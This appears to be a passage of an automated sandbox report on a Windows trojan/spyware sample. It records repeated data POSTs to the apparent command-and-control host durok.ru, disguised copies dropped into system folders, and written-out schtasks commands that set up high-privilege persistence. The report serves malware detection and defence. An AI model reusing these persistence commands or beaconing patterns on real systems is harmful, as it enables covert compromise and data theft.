                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2128Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 2548Expect: 100-continue
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | DNS traffic detected: DNS query: durok.ru
                    Source: unknown | HTTP traffic detected:
                        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                        Content-Type: application/octet-stream
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                        Host: durok.ru
                        Content-Length: 344
                        Expect: 100-continue
                        Connection: Keep-Alive
                    Source: services.exe, 00000010.00000002.2938691750.0000000002B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://durok.ru
                    Source: services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://durok.ru/
                    Source: services.exe, 00000010.00000002.2938691750.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.000000000297D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002864000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.000000000283E000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002753000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2938691750.0000000002B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php
                    Source: services.exe, 00000010.00000002.2938691750.0000000002864000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php$
                    Source: services.exe, 00000010.00000002.2938691750.00000000027C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpQgKD
                    Source: services.exe, 00000010.00000002.2938691750.0000000002753000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpWlc5QmNt
                    Source: C:\Windows\GameBarPresenceWriter\services.exe | Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\GameBarPresenceWriter\services.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\GameBarPresenceWriter\services.exe\:Zone.Identifier:$DATA
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\GameBarPresenceWriter\c5b4cb5e9653cc
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe\:Zone.Identifier:$DATA
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\BitLockerDiscoveryVolumeContents\d766a8fd310fca
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe\:Zone.Identifier:$DATA
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe | File created: C:\Windows\twain_32\d766a8fd310fca
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B79FE6935_2_00007FFD9B79FE69
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B791AC535_2_00007FFD9B791AC5
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7D594F35_2_00007FFD9B7D594F
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC84E35_2_00007FFD9B7AC84E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC78235_2_00007FFD9B7AC782
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC73535_2_00007FFD9B7AC735
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC5A835_2_00007FFD9B7AC5A8
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC90C35_2_00007FFD9B7AC90C
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC91935_2_00007FFD9B7AC919
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC92635_2_00007FFD9B7AC926
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC88B35_2_00007FFD9B7AC88B
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AC87E35_2_00007FFD9B7AC87E
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 35_2_00007FFD9B7AB0DD35_2_00007FFD9B7AB0DD
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B77FE6936_2_00007FFD9B77FE69
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C84E36_2_00007FFD9B78C84E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C78236_2_00007FFD9B78C782
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C73536_2_00007FFD9B78C735
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C5AF36_2_00007FFD9B78C5AF
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C90C36_2_00007FFD9B78C90C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C91936_2_00007FFD9B78C919
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C92636_2_00007FFD9B78C926
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C88B36_2_00007FFD9B78C88B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78C87E36_2_00007FFD9B78C87E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B7B594F36_2_00007FFD9B7B594F
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B771AC536_2_00007FFD9B771AC5
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 36_2_00007FFD9B78B0DD36_2_00007FFD9B78B0DD
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B77FE6937_2_00007FFD9B77FE69
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B7B594F37_2_00007FFD9B7B594F
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C84E37_2_00007FFD9B78C84E
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C78237_2_00007FFD9B78C782
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C73537_2_00007FFD9B78C735
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C5AF37_2_00007FFD9B78C5AF
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C90C37_2_00007FFD9B78C90C
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C91937_2_00007FFD9B78C919
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C92637_2_00007FFD9B78C926
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C88B37_2_00007FFD9B78C88B
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78C87E37_2_00007FFD9B78C87E
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B771AC537_2_00007FFD9B771AC5
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 37_2_00007FFD9B78B0DD37_2_00007FFD9B78B0DD
                    Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ADqcsYvZ.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                    Source: RbOZahUq.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: HtvJqEPI.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: yKbtGcJa.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: fxzonGoL.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: WPgYDdje.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: MgNITBew.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: uUlCzfJh.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: klRmPCEz.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1750255997.000000001BE45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exe, 00000000.00000002.1750078986.000000001BE17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exe, 00000000.00000000.1662784857.00000000004A4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Z4D3XAZ2jB.exe
                    Source: Z4D3XAZ2jB.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Z4D3XAZ2jB.exe Static PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: services.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe0.0.dr Static PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe1.0.dr Static PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: ZDtOzYsYYWKWEhNYzFc.exe2.0.dr Static PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: RbOZahUq.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: HtvJqEPI.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: yKbtGcJa.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: fxzonGoL.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: WPgYDdje.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: uUlCzfJh.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: klRmPCEz.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@37/74@1/1
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\Desktop\wySLBGmi.log
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
                    Source: C:\Windows\GameBarPresenceWriter\services.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\a35fc7c35ac07669507f238ec6844456a8c9fb2c4761bbe6ae2ce46e1ccb54df
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File created: C:\Users\user\AppData\Local\Temp\ii0xQfCo43
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat"
                    Source: Z4D3XAZ2jB.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Z4D3XAZ2jB.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\GameBarPresenceWriter\services.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Z4D3XAZ2jB.exe Virustotal: Detection: 59%
                    Source: Z4D3XAZ2jB.exe ReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe File read: C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                    Source: unknown Process created: C:\Users\user\Desktop\Z4D3XAZ2jB.exe "C:\Users\user\Desktop\Z4D3XAZ2jB.exe"
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                    Source: unknown Process created: C:\Windows\GameBarPresenceWriter\services.exe C:\Windows\GameBarPresenceWriter\services.exe
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown Process created: C:\Windows\GameBarPresenceWriter\services.exe C:\Windows\GameBarPresenceWriter\services.exe
                    Source: unknown Process created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                    Source: unknown Process created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknown Process created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknown Process created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknown Process created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknown Process created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknown Process created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknown Process created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknown Process created: C:\Windows\GameBarPresenceWriter\services.exe "C:\Windows\GameBarPresenceWriter\services.exe"
                    Source: unknown Process created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknown Process created: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknown Process created: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: unknown Process created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: ktmw32.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: dlnashext.dll
